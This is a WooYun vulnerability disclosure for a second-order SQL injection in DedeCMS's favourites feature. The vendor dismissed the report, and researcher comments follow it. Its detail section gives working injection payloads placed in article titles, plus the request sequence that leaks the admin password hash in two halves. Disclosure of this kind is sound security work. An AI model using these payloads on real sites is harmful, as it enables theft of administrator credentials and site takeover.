当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(79) 关注此漏洞

缺陷编号: WooYun-2013-46375

漏洞标题: DedeCMS某功能SQL注射漏洞

相关厂商: Dedecms

漏洞作者: Undoit

提交时间: 2013-12-18 19:27

公开时间: 2014-03-15 19:28

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 18

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php源码审核 sql注射漏洞利用技巧

8人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-18: 细节已通知厂商并且等待厂商处理中
2013-12-23: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-02-16: 细节向核心白帽子及相关领域专家公开
2014-02-26: 细节向普通白帽子公开
2014-03-08: 细节向实习白帽子公开
2014-03-15: 细节向公众公开

简要描述:

详细说明:

收藏文章功能$title变量未过滤,造成二次注入。

利用步骤(以获取dede_admin.pwd字段的值为例):

1)注册会员,登录,发表文章,文章标题为

u',char(@`'`), (select pwd from dede_admin))#

获取aid。这里aid=108

1.png



2) 提交请求:

http://**.**.**.**/DedeCMS/plus/stow.php?aid=108&type=001

3) 访问:http://**.**.**.**/DedeCMS/member/mystow.php

点击刚才发布的文章的“推荐“链接,打开如下连接

http://**.**.**.**/DedeCMS/plus/recommend.php?type=29a53fb3c3&aid=108

其中type=29a53fb3c3的 29a53fb3c3 为dede_admin.pwd字段的前10位

2.png



数据库中的数据:

3.png





4) 后10位使用类似的步骤,不同的是发布的文章标题为:

u',char(@`'`),substring((select pwd from dede_admin),11))#





漏洞证明:

2.png

修复方案:

过滤

版权声明:转载请注明来源 Undoit@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-03-15 19:28

厂商回复:

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-12-18 19:28 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)
    0

    靠谱!

    1# 回复此人
  2. 2013-12-18 19:32 | xfkxfk 认证白帽子 ( 核心白帽子 | Rank:2299 漏洞数:351 | 呵呵!)
    0

    mark

    2# 回复此人
  3. 2013-12-18 20:38 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)
    0

    标注一下!

    3# 回复此人
  4. 2013-12-18 20:40 | gainover 认证白帽子 ( 普通白帽子 | Rank:1805 漏洞数:97 | PKAV技术宅社区! -- gainover| 工具猫网络-...)
    0

    给力啊~

    4# 回复此人
  5. 2013-12-18 21:26 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)
    0

    通杀?

    5# 回复此人
  6. 2013-12-18 21:27 | 乐乐、 ( 普通白帽子 | Rank:868 漏洞数:189 )
    0

    mark

    6# 回复此人
  7. 2013-12-18 21:49 | niliu 认证白帽子 ( 核心白帽子 | Rank:1719 漏洞数:226 | 逆流而上)
    0

    给力

    7# 回复此人
  8. 2013-12-18 21:56 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)
    0

    果断关注

    8# 回复此人
  9. 2013-12-18 22:18 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )
    0

    忽略 想都不用想

    9# 回复此人
  10. 2013-12-18 23:19 | 红太阳 ( 路人 | Rank:0 漏洞数:1 | 莫欺少年穷)
    0

    这个NB

    10# 回复此人
  11. 2013-12-19 09:33 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)
    0

    求忽略

    11# 回复此人
  12. 2013-12-19 09:57 | 松子 ( 实习白帽子 | Rank:45 漏洞数:5 | 无事)
    0

    求忽略

    12# 回复此人
  13. 2013-12-19 10:57 | Leon ( 路人 | Rank:25 漏洞数:6 | 永无宁日啊)
    0

    求共享

    13# 回复此人
  14. 2013-12-21 15:50 | 假面, ( 实习白帽子 | Rank:32 漏洞数:7 | 我是一个小小小小小sb~)
    0

    求公开

    14# 回复此人
  15. 2013-12-22 11:08 | 小伟 ( 路人 | Rank:0 漏洞数:2 | )
    0

    牛逼啊

    15# 回复此人
  16. 2014-01-08 00:10 | 路人丁 ( 路人 | Rank:15 漏洞数:1 | 甲乙丙丁。)
    0

    危害等级:无影响厂商忽略

    16# 回复此人

登录后才能发表评论,请先 登录